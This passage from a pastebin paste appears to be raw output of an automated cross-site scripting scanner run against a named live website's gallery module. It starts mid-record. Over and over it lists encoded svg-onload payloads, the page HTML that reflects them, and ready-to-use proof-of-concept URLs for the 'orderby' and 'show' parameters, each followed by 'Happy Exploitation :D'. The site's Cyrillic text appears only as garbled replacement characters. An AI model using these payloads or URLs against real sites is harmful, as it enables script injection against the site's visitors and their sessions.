href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5909</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  50. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA%78%22%78%3e%78&show=
  51. [*] Happy Exploitation :D
  52. [*] Payload Found . . .
  53. [*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  54. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA">zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA">zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA">zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA">zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5910</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  55. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&show=
  56. [*] Happy Exploitation :D
  57. [*] Payload Found . . .
  58. [*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  59. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreAzigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreAzigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreAzigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreAzigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5911</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  60. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreAzigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&show=
  61. [*] Happy Exploitation :D
  62. [*] Payload Found . . .
  63. [*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  64. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA&show='>zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA&show='>zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA&show='>zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show='>zigoo0<svg/onload=confirm(/zigoo0/)>web'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5912</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  65. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA&show=%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  66. [*] Happy Exploitation :D
  67. [*] Payload Found . . .
  68. [*] Payload: %78%22%78%3e%78
  69. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA&show=x"x>x'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA&show=x"x>x'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA&show=x"x>x'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=x"x>x'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5913</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  70. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA&show=%78%22%78%3e%78
  71. [*] Happy Exploitation :D
  72. [*] Payload Found . . .
  73. [*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  74. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA&show=">zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA&show=">zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA&show=">zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=">zigoo0<svg/onload=confirm(/zigoo0/)>web'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5914</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  75. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA&show=%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  76. [*] Happy Exploitation :D
  77. [*] Payload Found . . .
  78. [*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  79. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA&show=zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA&show=zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA&show=zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=zigoo0<svg/onload=confirm(/zigoo0/)>web'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5915</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  80. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA&show=zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!